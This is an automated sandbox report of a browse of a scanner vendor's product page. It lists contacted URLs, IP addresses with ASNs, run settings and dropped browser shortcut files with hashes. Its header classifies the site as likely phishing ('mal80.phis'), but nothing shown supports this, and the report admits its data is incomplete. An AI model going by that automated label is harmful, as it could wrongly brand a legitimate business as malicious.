                                                                                                                                                              https://s.adroll.comchromecache_230.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://webfonts.zohowebstatic.com/opensansbold/font.woffchromecache_145.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.opensource.org/licenses/mit-license.phpchromecache_270.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://ambir.com/market-solutions/government-solutions/chromecache_181.2.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://ambir.com/wp-content/uploads/2024/03/comparison_chart_thumb_2024-600x464.pngchromecache_181.2.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://getbootstrap.com)chromecache_200.2.dr, chromecache_254.2.dr, chromecache_215.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://webfonts.zohowebstatic.com/opensansbolditalic/font.woffchromecache_145.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://us4-files.zohopublic.comchromecache_195.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2024/02/PS600_Shopify_square-1536x1536.jpgchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2023/09/logos.pngchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-600x600.jpgchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-json/wp/v2/pages/2990chromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/barcode-scanners/chromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square-1536x1536.jpgchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2023/10/Banking_card_scanners-1024x631.jpgchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square-768x768.jpgchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/product/imagescan-pro-490i-scanner-ds490-as/chromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/market-solutions/financial-solutions/chromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-300x300.jpgchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://ambir.com/wp-content/uploads/2024/02/DS687_Shopify_square-300x300.jpgchromecache_181.2.drfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://malsup.com/jquery/block/chromecache_270.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ambir.com/wp-content/uploads/2023/08/Ambir_logo_22.pngchromecache_181.2.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square-600x600.jpgchromecache_181.2.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://ambir.com/wp-content/uploads/2024/02/DS820_DS830_Shopify_square-1024x1024.jpgchromecache_181.2.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://ambir.com/barcode-scanner-set-up/chromecache_181.2.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://ambir.com/wp-content/uploads/2023/08/slide2-300x177.jpgchromecache_181.2.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://webfonts.zohowebstatic.com/opensanssemibolditalic/font.woffchromecache_145.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://ambir.com/dental-solutions/chromecache_181.2.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://ambir.com/wp-content/uploads/2024/10/Untitled-design-6.pngchromecache_181.2.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://ambir.com/wp-content/uploads/2024/02/PS600_Shopify_square-150x150.jpgchromecache_181.2.drfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://jqueryui.comchromecache_174.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://ambir.com/high-speed-adf-workgroup-scanners/chromecache_181.2.drfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-100x100.jpgchromecache_181.2.drfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://ambir.com/product/simplex-id-card-scanner-w-ambirscan-ps667-as/chromecache_181.2.drfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://ambir.com/wp-content/uploads/2023/10/PS667_DS687_Card_Scanners-600x122.jpgchromecache_181.2.drfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://fontawesome.com/license/freechromecache_148.2.dr, chromecache_214.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://ambir.com/wp-content/uploads/2023/08/slide2.jpgchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/wp-content/uploads/2023/09/AmbirScan_cloud_cap_NL-768x583.jpgchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/blog/ambir-announces-certification-of-its-scanners-for-docmgt/chromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/wp-content/uploads/2024/02/PS667_Shopify_square-150x150.jpgchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/ambir-for-docmgt/chromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-768x768.jpgchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/nscan-1060-60-ppm-high-speed-document-document-card-and-passport-scanner/chromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/sigpad-setup-tw/chromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-270x270.pngchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/wp-content/uploads/2024/02/PS670_Shopify_square.jpgchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2Fchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ambir.com/wp-content/uploads/2023/08/cropped-favicon-180x180.pngchromecache_181.2.drfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://static.zohocdn.com/forms/images/check-mark-outline.e44509047a0a79fb604be98bb10ec5bc.pngchromecache_195.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ambir.com/market-solutions/transportation-solutions-2/chromecache_181.2.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://ambir.com/wp-content/uploads/2024/03/comparison_chart_thumb_2024-768x594.pngchromecache_181.2.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://ambir.com/support/chromecache_181.2.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://ambir.com/contact-us/chromecache_181.2.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://www.ambirproductreg.com/myapp/product-registrationchromecache_181.2.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://ambir.com/extended-warranties/chromecache_181.2.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://ambir.com/product/nscan-700gt-hybrid-duplex-document-and-card-scanner-with-ambirscan-ds700gtchromecache_181.2.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://workforcenow.adp.com/mascsr/default/mdf/recruitment/recruitment.html?cid=5110bec3-089c-47ef-chromecache_181.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://ambir.com/product/travelscan-pro-simplex-document-id-scanner-with-ambirscan-ps600-as/chromecache_181.2.drfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://adservice.google.com/pagead/regclk?chromecache_204.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSEchromecache_218.2.dr, chromecache_179.2.dr, chromecache_147.2.dr, chromecache_248.2.dr, chromecache_221.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://s.adroll.com/j/chromecache_181.2.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://ambir.com/news-room/chromecache_181.2.drfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://ambir.com/wp-content/uploads/2024/02/DS490_Shopify_square-1536x1536.jpgchromecache_181.2.drfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://static.zohocdn.com/forms/images/formsicon.9f2e4a123b5b37ecd1e026b34f590968.pngchromecache_195.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ambir.com/faqs/chromecache_181.2.drfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://ambir.com/wp-content/uploads/2024/02/PS667_Shopify_square-768x768.jpgchromecache_181.2.drfalse
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              136.143.182.97
                                                                                                                                                                                              zpublic.zohopublic.comUnited States
                                                                                                                                                                                              2639ZOHO-ASUSfalse
                                                                                                                                                                                              37.252.171.149
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                              172.217.17.66
                                                                                                                                                                                              td.doubleclick.netUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              108.158.75.29
                                                                                                                                                                                              d28140lin2gosl.cloudfront.netUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              77.238.180.12
                                                                                                                                                                                              dcs-ups.g03.yahoodns.netUnited Kingdom
                                                                                                                                                                                              203070YAHOO-FRAFRfalse
                                                                                                                                                                                              35.244.154.8
                                                                                                                                                                                              idsync.rlcdn.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              66.102.1.155
                                                                                                                                                                                              stats.g.doubleclick.netUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              54.255.252.168
                                                                                                                                                                                              adserver-vpc-alb-0-1210614323.ap-southeast-1.elb.amazonaws.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              34.96.127.16
                                                                                                                                                                                              knrpc.olark.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              35.71.131.137
                                                                                                                                                                                              match.adsrvr.orgUnited States
                                                                                                                                                                                              237MERIT-AS-14USfalse
                                                                                                                                                                                              104.16.124.96
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              52.250.45.119
                                                                                                                                                                                              wndc1.outbrain.orgUnited States
                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                              172.217.17.34
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              13.248.245.213
                                                                                                                                                                                              eu-eb2.3lift.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              52.220.250.182
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              157.240.195.15
                                                                                                                                                                                              scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                                                                              13.227.8.5
                                                                                                                                                                                              platform-api.sharethis.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              107.178.254.65
                                                                                                                                                                                              pippio.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              18.165.220.61
                                                                                                                                                                                              d1qug1xf2dk5z6.cloudfront.netUnited States
                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                              199.67.80.86
                                                                                                                                                                                              h2-stratus.zohocdn.comUnited States
                                                                                                                                                                                              19142UNASSIGNEDfalse
                                                                                                                                                                                              142.250.181.34
                                                                                                                                                                                              googleads.g.doubleclick.netUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              104.17.25.14
                                                                                                                                                                                              cdnjs.cloudflare.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              35.214.136.108
                                                                                                                                                                                              user-data-eu.bidswitch.netUnited States
                                                                                                                                                                                              19527GOOGLE-2USfalse
                                                                                                                                                                                              104.18.10.207
                                                                                                                                                                                              maxcdn.bootstrapcdn.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              13.251.238.118
                                                                                                                                                                                              sludge-sludge-production-768039409.ap-southeast-1.elb.amazonaws.comUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              13.228.143.86
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                              35.244.159.8
                                                                                                                                                                                              us-u.openx.netUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              185.146.173.20
                                                                                                                                                                                              sdks.shopifycdn.comSweden
                                                                                                                                                                                              200760ELOGIC-ASElogicSrl-CloudServicesITfalse
                                                                                                                                                                                              207.65.33.82
                                                                                                                                                                                              pug-sin12.pubmnet.comUnited States
                                                                                                                                                                                              6203ISDN-NETUSfalse
                                                                                                                                                                                              185.106.33.48
                                                                                                                                                                                              il-vip001.taboola.comIsrael
                                                                                                                                                                                              200478TABOOLA-ASILfalse
                                                                                                                                                                                              172.217.21.36
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              142.250.181.66
                                                                                                                                                                                              cm.g.doubleclick.netUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              172.67.11.155
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              104.18.27.193
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              216.239.36.181
                                                                                                                                                                                              analytics-alv.google.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              136.143.190.100
                                                                                                                                                                                              accounts.zoho.comUnited States
                                                                                                                                                                                              2639ZOHO-ASUSfalse
                                                                                                                                                                                              104.18.26.193
                                                                                                                                                                                              dsum-sec.casalemedia.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              192.229.233.34
                                                                                                                                                                                              fp2e04.wac.rhocdn.netUnited States
                                                                                                                                                                                              15133EDGECASTUSfalse
                                                                                                                                                                                              34.111.113.62
                                                                                                                                                                                              pixel.tapad.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              142.250.181.100
                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              141.193.213.10
                                                                                                                                                                                              ambir.comUnited States
                                                                                                                                                                                              396845DV-PRIMARY-ASN1USfalse
                                                                                                                                                                                              141.193.213.11
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              396845DV-PRIMARY-ASN1USfalse
                                                                                                                                                                                              34.98.64.218
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                              104.22.1.204
                                                                                                                                                                                              acsbapp.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              45.61.136.196
                                                                                                                                                                                              nyciot.comUnited States
                                                                                                                                                                                              40676AS40676USfalse
                                                                                                                                                                                              104.16.123.96
                                                                                                                                                                                              www.cloudflare.comUnited States
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              37.252.171.21
                                                                                                                                                                                              ib.anycast.adnxs.comEuropean Union
                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                              IP
                                                                                                                                                                                              192.168.2.5
                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                              Analysis ID:1559730
                                                                                                                                                                                              Start date and time:2024-11-20 21:27:03 +01:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 3m 43s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                                                                                              Sample URL:https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal80.phis.win@24/236@150/49
                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 172.217.19.227, 74.125.205.84, 172.217.17.46, 34.104.35.123, 172.217.19.170, 216.58.208.227, 142.250.181.136, 93.184.221.240, 192.229.221.95, 172.217.17.72, 172.217.19.234, 142.250.181.74, 172.217.19.202, 142.250.181.138, 142.250.181.106, 172.217.17.74, 142.250.181.10, 172.217.17.42, 142.250.181.42, 172.67.142.245, 104.21.27.152, 142.250.181.78, 69.173.144.139, 69.173.144.138, 69.173.144.165, 13.107.42.14, 172.217.17.35
                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): www-linkedin-com.l-0005.l-msedge.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, pixel.rubiconproject.net.akadns.net, otelrules.azureedge.net, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, fe3cr.delivery.mp.microsoft.com, l-0005.l-msedge.net, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, www.googletagmanager.com, xandr-g-geo.trafficmanager.net, update.googleapis.com, clients.l.google.com, www.google-analytics.com
                                                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                              • VT rate limit hit for: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              No simulations
                                                                                                                                                                                              No context
                                                                                                                                                                                              No context
                                                                                                                                                                                              No context
                                                                                                                                                                                              No context
                                                                                                                                                                                              No context
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 19:28:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                                              Entropy (8bit):3.9793404825356586
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8jdkTIYRHDidAKZdA19ehwiZUklqeh1y+3:8qv7ey
                                                                                                                                                                                              MD5:953E700AA854EED6DE541905A3DBB264
                                                                                                                                                                                              SHA1:3D84414D766331D1AA4DFBCF9BF09E1BE5ABD018
                                                                                                                                                                                              SHA-256:5B74D2CF5DF4F7FB83A73C25302E31E5F144794FD3C215EAC943FA36F123843B
                                                                                                                                                                                              SHA-512:A72903BF9A09D1B6906BFE18722229A03ECB5E2CE54C37709500E5BEAE9E8EF908BC364B4455D8E83BC76D5A3E5233FB6521B2200427CC519B6AD9F5944510E9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,........;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 19:28:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                                              Entropy (8bit):3.99060935894058
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8gdkTIYRHDidAKZdA1weh/iZUkAQkqehOy+2:8zvJ9QLy
                                                                                                                                                                                              MD5:AACED9F08B4DBB60BDDF9E546E938FE9
                                                                                                                                                                                              SHA1:62B4E925D215575076559A1E402DF32AB70D6A95
                                                                                                                                                                                              SHA-256:E76386B9ECF8CD64035BBF1ACDAEF44080C113A9A09ED05DE400D2D61E9B0399
                                                                                                                                                                                              SHA-512:4B01DCDDF2DE2A188EB3ABB13EAC7BDA0450EAD0F67D9729FE992B8BD28066ADE0F78723F602E900CC936ECCF308DBBBCFD47FCDB6C21248B588AFDAED4F21AF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....V...;..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ItY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VtY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VtY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VtY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2693
                                                                                                                                                                                              Entropy (8bit):4.003153420365631
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:8xZdkTIYsHDidAKZdA14tseh7sFiZUkmgqeh7sky+BX:8x4v+nCy
                                                                                                                                                                                              MD5:EE1BA43830D55EAF735B5BE780B99273
                                                                                                                                                                                              SHA1:34ED4E7C70FDEC9E9C6B05354F9D512FBF0B0472
                                                                                                                                                                                              SHA-256:8AEE10ED7161DD208C8507F568E786131729958C6DE78A326BD9BC4AC74F4589
                                                                                                                                                                                              SHA-512:A7390354C302107A8ED774179A1A21B86FDF59F6B8042B7F1C450238EF83D9B1A58BE2902B405CE7088926C8ED739A037ABC0EBE20732EF4F33E50753B1EA4E8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
